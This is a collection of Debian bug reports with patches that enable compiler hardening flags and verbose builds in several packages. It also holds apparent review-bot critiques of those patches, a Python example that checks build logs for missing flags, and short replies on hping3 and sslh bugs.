@@ -11,17 +11,15 @@ DEB_HOST_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE) DEB_BUILD_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE) -CFLAGS = -Wall -g +CFLAGS=$(shell dpkg-buildflags --get CFLAGS) +CFLAGS += -Wall +CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS) +LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS) INSTALL = install INSTALL_FILE= $(INSTALL) -p-oroot -groot -m644 INSTALL_PROGRAM = $(INSTALL) -p-oroot -groot -m755 INSTALL_SCRIPT = $(INSTALL) -p-oroot -groot -m755 INSTALL_DIR = $(INSTALL) -p -d -oroot -groot -m755 -ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif ifeq (,$(filter nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s STRIP = true @@ -47,12 +45,14 @@ cp -a configure configure.save [ ! -f Makefile ] || $(MAKE) distclean mv configure.save configure + # Remove compilation generated files + rm -f config.status GNUmakefile config.h build: build-stamp build-stamp: patch-stamp $(checkdir) - CFLAGS=$(CFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none + CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none $(MAKE) cd manual $(MAKE) manual.html touch build-stamp
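Review bot: CFLAGS, CPPFLAGS and LDFLAGS are assigned with = from $(shell dpkg-buildflags --get ...), which makes them recursively expanded: dpkg-buildflags is run again each time one of them is referenced, and CFLAGS += -Wall extends a recursive definition rather than a fixed value. Use := for the three assignments, or include /usr/share/dpkg/buildflags.mk, so the flags are computed once and the value seen by ./configure is the one a reader of debian/rules expects.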
Bug#761133: Hardening options incomplete (LDFLAGS)
Source: log4cplus Version: 1.0.4-1.1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, As you define LDFLAGS, the default exported LDFLAGS is missing (relro). I also enable parallel build to speed up when you have more than one cpu. diff -Nru log4cplus-1.0.4/debian/changelog log4cplus-1.0.4/debian/changelog --- log4cplus-1.0.4/debian/changelog 2014-06-29 08:23:00.0 +0200 +++ log4cplus-1.0.4/debian/changelog 2014-09-11 00:15:39.0 +0200 @@ -1,3 +1,11 @@ +log4cplus (1.0.4-1.2) unstable; urgency=medium + + * Non-maintainer upload. + * Use exported LDFLAGS (relro) in DEB_CONFIGURE_SCRIPT_ENV + * Enable parallel build + + -- Guillaume Delacour g...@iroqwa.org Thu, 11 Sep 2014 00:08:42 +0200 + log4cplus (1.0.4-1.1) unstable; urgency=low * Non-maintainer upload. diff -Nru log4cplus-1.0.4/debian/rules log4cplus-1.0.4/debian/rules --- log4cplus-1.0.4/debian/rules 2012-01-19 07:26:19.0 +0100 +++ log4cplus-1.0.4/debian/rules 2014-09-11 00:09:50.0 +0200 
@@ -8,8 +8,12 @@ #install/liblog4cplus:: +ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + MAKEFLAGS += -j$(NUMJOBS) +endif -DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread +DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread $(LDFLAGS) DEB_DH_INSTALL_SOURCEDIR := debian/tmp binary-install/liblog4cplus-dev::
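Review bot: The $(LDFLAGS) appended to DEB_CONFIGURE_SCRIPT_ENV only helps if LDFLAGS already holds the dpkg-buildflags value at this point in debian/rules, and nothing in the visible hunk sets or includes it; if it is empty here, the line expands to the old value and relro is still missing. Say in a comment where LDFLAGS comes from and confirm -Wl,-z,relro on a verbose link line after the build. The parallel-build block is unrelated to hardening and would be easier to revert or bisect as a separate change.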
Bug#760726: Please enable hardened build flags
Package: squidguard Version: 1.5-2+b1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Please find attached a patch that enables hardening build flags in your package. The upstream test suite run after the build confirms the good execution of the binary. diff -Nru squidguard-1.5/debian/changelog squidguard-1.5/debian/changelog --- squidguard-1.5/debian/changelog 2014-01-24 21:52:43.0 +0100 +++ squidguard-1.5/debian/changelog 2014-09-07 11:22:24.0 +0200 @@ -1,3 +1,10 @@ +squidguard (1.5-2.1) unstable; urgency=medium + + * Non-maintainer upload. + * Pass hardened flags through dpkg-buildflags to configure + + -- Guillaume Delacour g...@iroqwa.org Sun, 07 Sep 2014 11:21:46 +0200 + squidguard (1.5-2) unstable; urgency=low * Fix small typo in update-squidguard. diff -Nru squidguard-1.5/debian/rules squidguard-1.5/debian/rules --- squidguard-1.5/debian/rules 2014-09-07 11:21:09.0 +0200 +++ squidguard-1.5/debian/rules 2014-09-07 11:22:54.0 +0200 
@@ -1,11 +1,14 @@ #!/usr/bin/make -f # -*- makefile -*- +export DEB_BUILD_MAINT_OPTIONS = hardening=+all + %: dh $@ override_dh_auto_configure: - dh_auto_configure -- --with-db=/usr \ + dh_auto_configure -- $(shell dpkg-buildflags --export=configure) \ + --with-db=/usr \ --with-ldap=yes --with-ldap-lib=/usr/lib \ --with-sg-config=/etc/squidguard/squidGuard.conf \ --with-sg-logdir=/var/log/squidguard \
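Review bot: export DEB_BUILD_MAINT_OPTIONS = hardening=+all is set inside the makefile, but the flags handed to configure come from $(shell dpkg-buildflags --export=configure), and GNU make before 4.4 does not pass exported makefile variables to $(shell ...); on those versions that dpkg-buildflags run does not see hardening=+all, so pie and bindnow would be absent from the flags given explicitly to configure. Either set DEB_BUILD_MAINT_OPTIONS inside the shell command itself, or, if the package is at debhelper compat 9, drop the $(shell ...) arguments and let dh_auto_configure take the flags from the exported variable.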
Bug#760749: CPPFLAGS unused
Package: tree Version: 1.7.0-1 Severity: normal Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Your package doesn't use CPPFLAGS (as upstream Makefile) at build time. Please find attached a patch that fixes that. diff -Nru tree-1.7.0/debian/changelog tree-1.7.0/debian/changelog --- tree-1.7.0/debian/changelog 2014-04-27 10:34:34.0 +0200 +++ tree-1.7.0/debian/changelog 2014-09-07 15:24:21.0 +0200 @@ -1,3 +1,11 @@ +tree (1.7.0-1.1) unstable; urgency=medium + + * Non-maintainer upload. + * Pass CPPFLAGS at build time (enable D_FORTIFY_SOURCE), patch upstream Makefile + * Remove generated binary in clean + + -- Guillaume Delacour g...@iroqwa.org Sun, 07 Sep 2014 15:11:27 +0200 + tree (1.7.0-1) unstable; urgency=medium * [63b3dfd] Imported Upstream version 1.7.0 (Closes: #745776) diff -Nru tree-1.7.0/debian/patches/cppflags.diff tree-1.7.0/debian/patches/cppflags.diff --- tree-1.7.0/debian/patches/cppflags.diff 1970-01-01 01:00:00.0 +0100 +++ tree-1.7.0/debian/patches/cppflags.diff 2014-09-07 15:18:02.0 +0200 
@@ -0,0 +1,17 @@ +Author: Guillaume Delacour g...@iroqwa.org +Subject: Use CPPFLAGS in upstream Makefile +Last-Update: 2014-09-07 + +Index: tree-1.7.0/Makefile +=== +--- tree-1.7.0.orig/Makefile tree-1.7.0/Makefile +@@ -87,7 +87,7 @@ tree: $(OBJS) + $(CC) $(LDFLAGS) -o $(TREE_DEST) $(OBJS) + + $(OBJS): %.o: %.c tree.h +- $(CC) $(CFLAGS) -c -o $@ $ ++ $(CC) $(CFLAGS) $(CPPFLAGS) -c -o $@ $ + + clean: + if [ -x $(TREE_DEST) ]; then rm $(TREE_DEST); fi diff -Nru tree-1.7.0/debian/patches/series tree-1.7.0/debian/patches/series --- tree-1.7.0/debian/patches/series 2014-04-27 10:34:34.0 +0200 +++ tree-1.7.0/debian/patches/series 2014-09-07 15:12:45.0 +0200 @@ -1 +1,2 @@ PATH_MAX +cppflags.diff diff -Nru tree-1.7.0/debian/rules tree-1.7.0/debian/rules --- tree-1.7.0/debian/rules 2014-04-27 10:34:34.0 +0200 +++ tree-1.7.0/debian/rules 2014-09-07 15:23:01.0 +0200 @@ -17,10 +17,14 @@ CFLAGS += -Wall -DLINUX -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 override_dh_auto_build: - $(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS) + $(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS) CPPFLAGS=$(CPPFLAGS) override_dh_auto_install: $(MAKE) install prefix=$(prefix) MANDIR=$(MANDIR) +override_dh_clean: + dh_clean + rm -f tree + %: dh $@
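Review bot: override_dh_clean adds rm -f tree with the binary name hard-coded, while the upstream Makefile's clean target, visible in the context of the cppflags.diff hunk, already removes $(TREE_DEST) when it exists and is executable. Calling $(MAKE) clean from the override keeps debian/rules in step with upstream if the destination name changes, and the hard-coded rm can then go.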
Bug#760699: Hardened build flags not fully enabled
On Sunday 07 September 2014 at 03:40 +0200, Guillaume Delacour wrote: Package: apt-cacher-ng Version: 0.7.27-1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Please find attached a patch that enables all hardening flags in your package. Although apt-cacher-ng uses dh/9, CPPFLAGS (fortify) was not enabled. Besides, since debhelper 0.9.20120417 handles the workaround of appending CPPFLAGS to CXXFLAGS, I still had to do it (I've not investigated though). I've also enabled the optional pie and bindnow. debhelper must handle the situation (/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure) and enable verbose compiler command lines, there is a problem somewhere (due to package or in debhelper itself). As it concerns some other packages, I'll take a look and report back. After the build I've made some tests (apt-get update apt-get install $package through apt-cacher-ng) which confirm that it won't break anything (at least at first glance). Finally, I've made the build verbose to let blhc see if all flags are enabled in the future. -- Guillaume Delacour g...@iroqwa.org
Bug#760699: Hardened build flags not fully enabled
On Sunday 07 September 2014 at 21:35 +0200, Eduard Bloch wrote:

Hello,

* Guillaume Delacour [Sun, Sep 07 2014, 08:54:13PM]:

On Sunday 07 September 2014 at 03:40 +0200, Guillaume Delacour wrote:

Package: apt-cacher-ng
Version: 0.7.27-1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

Hello,

Please find attached a patch that enables all hardening flags in your package. Although apt-cacher-ng uses dh/9, CPPFLAGS (fortify) was not enabled. Besides, since debhelper 0.9.20120417 handles the workaround of appending CPPFLAGS to CXXFLAGS, I still had to do it (I've not investigated though). I've also enabled the optional pie and bindnow.

debhelper must handle the situation (/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure) and enable verbose compiler command lines, there is a problem somewhere (due to the package or in debhelper itself). As it concerns some other packages, I'll take a look and report back.

Uhm... I have a wrapper GNUMakefile there for convenience, which builds the source out-of-source-tree and also extends CXXFLAGS as needed. Maybe that's the reason why tweaking CMake internal variables is not really effective. And I guess that this method is not uncommon since CMake tends to be very messy and the best way to get reproducible builds is actually to make OOST builds and wipe the directory on cleaning.

This is exactly the reason why debhelper does not consider it a real cmake build system: because of the presence of GNUmakefile.

To have a verbose build instead of dh_auto_build -- VERBOSE=1:

export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON

does the job, but then the fortify flag disappears (!).

For CPPFLAGS (which is ignored by CMake itself) I tried different methods such as:

include /usr/share/dpkg/buildflags.mk
CFLAGS+=$(CPPFLAGS)
CXXFLAGS+=$(CPPFLAGS)

Another one:

export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON -DCMAKE_C_FLAGS_RELWITHDEBINFO:STRING=$(CXXFLAGS) -D_FORTIFY_SOURCE=2

With no success.
Anyway, the first patch works (but may need some documentation about the special use case), but feel free to do it differently; the goal is to enable all build flags dynamically through dpkg-buildflags to handle future compiler options, and to have a verbose build (meaning full compiler command lines) to check the presence of flags in buildd logs.

You can use hardening-wrapper (from the hardening-includes package) to test the generated binary against flags:

$ hardening-check build/apt-cacher-ng
build/apt-cacher-ng:
 Position Independent Executable: yes
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: yes

Regards, Eduard.

-- 
Guillaume Delacour g...@iroqwa.org
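One way to check a verbose build log for the flags discussed in this thread, given as an added example: it is not blhc's code and not part of any package mentioned here. The required flag set is an assumption modelled on hardening=+all, the function names are hypothetical, and the log lines are constructed.

```python
"""Simplified blhc-style check of a verbose build log (added example)."""
import os
import re
import shlex

# Assumed policy, modelled on hardening=+all; real dpkg-buildflags output
# differs between releases and architectures.
COMPILER = re.compile(
    r"^(?:[\w.+-]*-)?(?:gcc|g\+\+|cc|c\+\+|clang|clang\+\+)(?:-[\d.]+)?$")
SOURCE = re.compile(r"\.(?:c|cc|cpp|cxx|C)$")
# Output of a non-verbose build: the command line is hidden, nothing to check.
QUIET = re.compile(
    r"^\s*(?:CC|CXX|CCLD|CXXLD|LD|LINK)\s+\S+\s*$|Building C(?:XX)? object")
STACK_PROTECTOR = {"-fstack-protector", "-fstack-protector-strong",
                   "-fstack-protector-all"}


def linker_z_keywords(tokens):
    """Keywords given as -Wl,-z,KEYWORD, including chained -Wl,-z,a,-z,b."""
    words = set()
    for tok in tokens:
        if tok.startswith("-Wl,"):
            parts = tok.split(",")[1:]
            for i, part in enumerate(parts[:-1]):
                if part == "-z":
                    words.add(parts[i + 1])
    return words


def missing_flags(line):
    """Return missing hardening flags, or None if line is no compiler call."""
    try:
        tokens = shlex.split(line)
    except ValueError:          # unbalanced quote in ordinary log text
        return None
    if "&&" in tokens:          # CMake style: cd <dir> && <compiler> ...
        tokens = tokens[len(tokens) - tokens[::-1].index("&&"):]
    if not tokens or not COMPILER.match(os.path.basename(tokens[0])):
        return None
    args = set(tokens[1:])
    compiles = any(SOURCE.search(t) for t in tokens[1:])
    links = not ({"-c", "-S", "-E"} & args)
    # Shared objects are built with -fPIC/-shared, so PIE is not expected.
    pie_expected = not ({"-fPIC", "-shared"} & args)
    missing = []
    if compiles:
        if not STACK_PROTECTOR & args:
            missing.append("-fstack-protector")
        for flag in ("-Wformat", "-Werror=format-security",
                     "-D_FORTIFY_SOURCE=2"):
            if flag not in args:
                missing.append(flag)
        if pie_expected and "-fPIE" not in args:
            missing.append("-fPIE")
    if links:
        z_words = linker_z_keywords(tokens)
        for word in ("relro", "now"):
            if word not in z_words:
                missing.append("-Wl,-z," + word)
        if pie_expected and "-pie" not in args:
            missing.append("-pie")
    return missing


def check_log(text):
    """Scan a build log; report checked lines, quiet lines and findings."""
    report = {"checked": 0, "quiet": [], "findings": []}
    for number, line in enumerate(text.splitlines(), 1):
        if QUIET.search(line):
            report["quiet"].append(number)
            continue
        missing = missing_flags(line)
        if missing is None:
            continue
        report["checked"] += 1
        if missing:
            report["findings"].append((number, missing))
    return report


# Constructed log lines (not taken from a real buildd log).
SAMPLE_LOG = """\
dh_auto_build -- VERBOSE=1
cd /build/obj && /usr/bin/c++ -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -fPIE -o acng.o -c /build/source/acng.cc
/usr/bin/c++ -g -O2 -fPIE -pie -Wl,-z,relro -Wl,-z,now acng.o -o apt-cacher-ng
cc -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2 -fPIC -c -o hiredis.o hiredis.c
gcc -Wl,-z,relro,-z,now -fPIE -pie -o tree tree.o
    CC linenoise.o
make[1]: Leaving directory '/build'
"""

if __name__ == "__main__":
    result = check_log(SAMPLE_LOG)
    for number, flags in result["findings"]:
        print("line %d: missing %s" % (number, " ".join(flags)))
    for number in result["quiet"]:
        print("line %d: non-verbose output, flags cannot be checked" % number)
```

Line 2 of the sample reproduces the case reported for apt-cacher-ng, where the C++ compile line carries CXXFLAGS but not the fortify define from CPPFLAGS; line 6 is the kind of quiet output that V=1 or VERBOSE=1 is meant to replace.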
Bug#760792: Enable verbose build
Package: minidlna
Version: 1.1.2+dfsg-1.1+b1
Severity: minor
Tags: patch

Hi,

configure is called directly from override_dh_auto_configure in debian/rules, which overwrites all other options (such as --disable-silent-rules) passed via debhelper. Unless there is a good reason to do that, please consider passing the overridden options instead; this gives the possibility to enable a verbose build to detect compiler build flags on buildd.

diff -Nru minidlna-1.1.2+dfsg/debian/changelog minidlna-1.1.2+dfsg/debian/changelog --- minidlna-1.1.2+dfsg/debian/changelog 2014-06-16 12:01:30.0 +0200 +++ minidlna-1.1.2+dfsg/debian/changelog 2014-09-07 23:02:03.0 +0200 
@@ -1,3 +1,12 @@ +minidlna (1.1.2+dfsg-1.2) unstable; urgency=medium + + * Non-maintainer upload. + * Don't call ./configure directly but pass overriden options to +dh_auto_configure instead; this make possible to enable verbose build on +buildd + + -- Guillaume Delacour g...@iroqwa.org Sun, 07 Sep 2014 22:49:35 +0200 + minidlna (1.1.2+dfsg-1.1) unstable; urgency=medium * Non-maintainer upload. diff -Nru minidlna-1.1.2+dfsg/debian/rules minidlna-1.1.2+dfsg/debian/rules --- minidlna-1.1.2+dfsg/debian/rules 2014-04-28 22:33:25.0 +0200 +++ minidlna-1.1.2+dfsg/debian/rules 2014-09-07 23:02:15.0 +0200 @@ -9,7 +9,7 @@ dh $@ --with autoreconf override_dh_auto_configure: - ./configure --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin + dh_auto_configure -- --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin override_dh_installchangelogs: dh_installchangelogs NEWS
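Review bot: replacing ./configure with dh_auto_configure in override_dh_auto_configure changes more than verbosity, because debhelper puts its own default directory options in front of the ones given after --. Check that the defaults it introduces (sysconfdir, localstatedir, libdir) do not move any file the package installs, and say so in the changelog entry, which currently only mentions the verbose build. The changelog text also spells "overridden" as "overriden".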
Bug#760699: Hardened build flags not fully enabled
Package: apt-cacher-ng
Version: 0.7.27-1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

Hello,

Please find attached a patch that enables all hardening flags in your package. Although apt-cacher-ng uses dh/9, CPPFLAGS (fortify) was not enabled. Besides, since debhelper 0.9.20120417 handles the workaround of appending CPPFLAGS to CXXFLAGS, I still had to do it (I've not investigated though). I've also enabled the optional pie and bindnow.

After the build I've made some tests (apt-get update apt-get install $package through apt-cacher-ng) which confirm that it won't break anything (at least at first glance). Finally, I've made the build verbose to let blhc see if all flags are enabled in the future.

diff -Nru apt-cacher-ng-0.7.27/debian/rules apt-cacher-ng-0.7.27/debian/rules --- apt-cacher-ng-0.7.27/debian/rules 2014-07-17 21:35:38.0 +0200 +++ apt-cacher-ng-0.7.27/debian/rules 2014-09-07 02:55:35.0 +0200 
@@ -3,9 +3,16 @@ TGT=$(CURDIR)/debian/apt-cacher-ng CDIR=$(TGT)/etc/apt-cacher-ng +export DEB_BUILD_MAINT_OPTIONS = hardening=+all +# cmake doesn't follow CPPFLAGS, see #653916 +CXXFLAGS+=$(CPPFLAGS) + %: dh $@ --parallel --with systemd +override_dh_auto_build: + dh_auto_build -- VERBOSE=1 + override_dh_install: dh_install $(test -e build/acngfs || echo -Xacngfs) cp systemd/apt-cacher-ng.service debian
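Review bot: CXXFLAGS+=$(CPPFLAGS) in debian/rules only has an effect if both variables already hold values when the file is parsed, and nothing in this hunk sets them (no include of /usr/share/dpkg/buildflags.mk, no dpkg-buildflags call) or exports CXXFLAGS afterwards. Make the source of the flags explicit before appending and export the result, so that the build is guaranteed to see -D_FORTIFY_SOURCE=2 rather than depending on what the environment happens to provide. Running blhc over the VERBOSE=1 log would confirm it.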
Bug#760567: Use dpkg-buildflags
Source: redis
Version: 2.8.13
Severity: normal
Tags: patch

Hi,

Please find attached a proposal that uses dpkg-buildflags (and hardening flags) and enables multiple make jobs in your package. Please note that *FLAGS are defined and exported manually in debian/rules since the package uses debhelper 7 (these 4 lines can be removed if debhelper 9 is used).

-- System Information:
Debian Release: jessie/sid
 APT prefers unstable
 APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.2.0-67-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

diff -Nru redis-2.8.13/debian/changelog redis-2.8.13/debian/changelog --- redis-2.8.13/debian/changelog 2014-08-05 18:16:56.0 +0200 +++ redis-2.8.13/debian/changelog 2014-09-05 14:31:00.0 +0200 @@ -1,3 +1,12 @@ +redis (2:2.8.13-3.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags CFLAGS, CPPFLAGS (patch upstream Makefile) and +LDFLAGS, also use pie and relro via DEB_BUILD_MAINT_OPTIONS + * Call make V=1 to show gcc command lines (blhc) and enable parallel build + + -- Guillaume Delacour g...@iroqwa.org Fri, 05 Sep 2014 09:49:19 +0200 + redis (2:2.8.13-3) unstable; urgency=low * Correct permissions of our /var directories by chowning them recursively. diff -Nru redis-2.8.13/debian/patches/04-dpkg-buildflags.diff redis-2.8.13/debian/patches/04-dpkg-buildflags.diff --- redis-2.8.13/debian/patches/04-dpkg-buildflags.diff 1970-01-01 01:00:00.0 +0100 +++ redis-2.8.13/debian/patches/04-dpkg-buildflags.diff 2014-09-05 12:16:02.0 +0200 
@@ -0,0 +1,43 @@ +Author: Guillaume Delacour g...@iroqwa.org +Subject: Add CPPFLAGS in upstream makefiles +Last-Update: 2014-09-05 + +Index: redis-2.8.13/src/Makefile +=== +--- redis-2.8.13.orig/src/Makefile redis-2.8.13/src/Makefile +@@ -87,7 +87,7 @@ ifeq ($(MALLOC),jemalloc) + FINAL_LIBS+= -ljemalloc + endif + +-REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS) ++REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS) $(CPPFLAGS) + REDIS_LD=$(QUIET_LINK)$(CC) $(FINAL_LDFLAGS) + REDIS_INSTALL=$(QUIET_INSTALL)$(INSTALL) + +Index: redis-2.8.13/deps/linenoise/Makefile +=== +--- redis-2.8.13.orig/deps/linenoise/Makefile redis-2.8.13/deps/linenoise/Makefile +@@ -6,7 +6,7 @@ R_CFLAGS= $(STD) $(WARN) $(OPT) $(DEBUG) + R_LDFLAGS= $(LDFLAGS) + DEBUG= -g + +-R_CC=$(CC) $(R_CFLAGS) ++R_CC=$(CC) $(R_CFLAGS) $(CPPFLAGS) + R_LD=$(CC) $(R_LDFLAGS) + + linenoise.o: linenoise.h linenoise.c +Index: redis-2.8.13/deps/hiredis/Makefile +=== +--- redis-2.8.13.orig/deps/hiredis/Makefile redis-2.8.13/deps/hiredis/Makefile +@@ -28,7 +28,7 @@ CC:=$(shell sh -c 'type $(CC) /dev/null + OPTIMIZATION?=-O3 + WARNINGS=-Wall -W -Wstrict-prototypes -Wwrite-strings + DEBUG?= -g -ggdb +-REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH) ++REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH) $(CPPFLAGS) + REAL_LDFLAGS=$(LDFLAGS) $(ARCH) + + DYLIBSUFFIX=so diff -Nru redis-2.8.13/debian/patches/series redis-2.8.13/debian/patches/series --- redis-2.8.13/debian/patches/series 2014-08-05 18:16:56.0 +0200 +++ redis-2.8.13/debian/patches/series 2014-09-05 14:04:24.0 +0200 @@ -1,3 +1,4 @@ 01-fix-ftbfs-on-kfreebsd.diff -p1 02-fix-ftbfs-on-kfreebsd -p1 03-use-system-jemalloc.diff -p1 +04-dpkg-buildflags.diff -p1 diff -Nru redis-2.8.13/debian/rules redis-2.8.13/debian/rules --- redis-2.8.13/debian/rules 2014-08-05 18:16:56.0 +0200 +++ redis-2.8.13/debian/rules 2014-09-05 14:18:15.0 +0200 
@@ -1,6 +1,17 @@ #!/usr/bin/make -f -unexport CFLAGS +export DEB_BUILD_MAINT_OPTIONS = hardening=+all + +CPPFLAGS:=$(shell dpkg-buildflags --get CPPFLAGS) +CFLAGS:=$(shell dpkg-buildflags --get CFLAGS) +LDFLAGS:=$(shell dpkg-buildflags --get LDFLAGS) +export CPPFLAGS CFLAGS LDFLAGS + +ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + MAKEFLAGS += -j$(NUMJOBS) + export MAKEFLAGS +endif ifneq (,$(filter $(shell dpkg-architecture -qDEB_HOST_ARCH),armel hurd-i386 kfreebsd-amd64 kfreebsd-i386 s390 sparc)) export FORCE_LIBC_MALLOC = yes @@ -14,6 +25,9 @@ override_dh_auto_install: +override_dh_auto_build: + dh_auto_build --parallel -- V=1 + clean: dh $@ rm -f src/release.h
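Review bot: in the first debian/rules hunk, export DEB_BUILD_MAINT_OPTIONS = hardening=+all is followed by three $(shell dpkg-buildflags --get ...) calls, and with the GNU make releases current for this upload an exported make variable is not placed in the environment of $(shell ...), so dpkg-buildflags would answer with its default set, without pie and bindnow. Pass the option on the command itself (DEB_BUILD_MAINT_OPTIONS=hardening=+all dpkg-buildflags --get CFLAGS) or include /usr/share/dpkg/buildflags.mk, then confirm with blhc on the V=1 log. The changelog entry names pie and relro while +all also turns on bindnow.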
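Review bot: the hand-written NUMJOBS/MAKEFLAGS block in the first debian/rules hunk and dh_auto_build --parallel in the second hunk both act on parallel=N from DEB_BUILD_OPTIONS, so the job count is handled twice. Keep one mechanism; the --parallel form is shorter and limits the effect to the build step, whereas an exported MAKEFLAGS applies to every make invoked from debian/rules.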
Bug#711075: hping3: Option '-z'/increasing TTL for traceroute mode doesn't work
On Tuesday 04 June 2013 at 14:55 +0200, christian mock wrote:

Package: hping3
Version: 3.a2.ds2-6
Severity: normal

Dear Maintainer,

First, sorry for the late reply.

In the current version of hping3, there seems to be no way to use Ctrl-Z to increase the TTL in the traceroute mode (-T). Neither with nor without the -z option does this work. In earlier versions, hping3 intercepted Ctrl-Z, now it just backgrounds due to shell job control.

Please note that the version 3.a2.ds2-6 was unchanged between Debian 6 and 7. Anyway, I don't reproduce this; every time I press Ctrl-z, the ttl is increased (Gnome terminal 3.4.1.1). If I use --unbind, the Ctrl-z is ignored by hping3, so the process goes in background. Can you re-test the feature, and maybe with another environment?

-- System Information:
Debian Release: 7.0
 APT prefers stable-updates
 APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=de_AT.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages hping3 depends on:
ii libc6 2.13-38
ii libpcap0.8 1.3.0-1
ii tcl8.4 8.4.19-5

hping3 recommends no packages.
hping3 suggests no packages.

-- no debconf information

-- 
Guillaume Delacour g...@iroqwa.org
Bug#688458: Conflicting types for variable ip_optlen
On Saturday 22 September 2012 at 22:07 +0100, Michael Tautschnig wrote:

Package: hping3
Version: 3.a2.ds2-6

While compiling the package using our research compiler infrastructure we noticed the following conflicting declaration of the variable ip_optlen:

- globals.h: extern char ip_optlen;
- main.c: unsigned ip_optlen;

This will cause undefined behaviour if the value of ip_optlen exceeds 127 for any architecture with signed char type. This is also problematic in other cases where ip_optlen stores the return value of functions returning unsigned char.

Good catch. I understand the possible collision, but I don't measure well the real impact in the source code. The hping3 author is not active anymore on this project and I can only maintain the packaging or minor modifications, so unless there is a blocker issue, I'll not investigate the problem further (but another patch for hping3 could be integrated in Debian if someone wants to take the time).

Thanks.

Best, Michael

-- 
Guillaume Delacour g...@iroqwa.org
Bug#735922: wishlist: document logging in /var/log/auth.log
On Saturday 18 January 2014 at 17:28 +0100, Geert Stappers wrote:

Package: sslh
Version: 1.13b-3.2
Severity: minor

Dear Maintainer,

When I have logged in through sslh, my connection is from localhost. I do understand this artifact of sslh. It took me some time to find out where the connection came from. It would be nice if the manual page said that logging is done in /var/log/auth.log

Yes you're right, sslh uses the LOG_AUTH facility (in common.c:488), which on Debian systems is logged in /var/log/auth.log (in /etc/rsyslog.conf:61). I'll propose upstream to add a syslog paragraph in the manpage to document this.

Thank you for maintaining sslh in Debian.

Cheers
Geert Stappers

-- System Information:
Debian Release: 7.0
 APT prefers stable-updates
 APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.2.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/dash

Versions of packages sslh depends on:
ii adduser 3.113+nmu3
ii debconf 1.5.49
ii libc6 2.13-38
ii libconfig9 1.4.8-5
ii lsb-base 4.1+Debian8
ii update-inetd 4.43

Versions of packages sslh recommends:
ii apache2 2.2.22-13
ii apache2-mpm-prefork [httpd] 2.2.22-13
ii openssh-server [ssh-server] 1:6.0p1-4

Versions of packages sslh suggests:
pn openbsd-inetd | inet-superserver none

-- Configuration Files:
/etc/default/sslh changed:
RUN=yes
DAEMON=/usr/sbin/sslh
DAEMON_OPTS=--user sslh --listen 0.0.0.0:443 --numeric --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid

-- debconf information:
* sslh/inetd_or_standalone: standalone

-- 
Guillaume Delacour g...@iroqwa.org
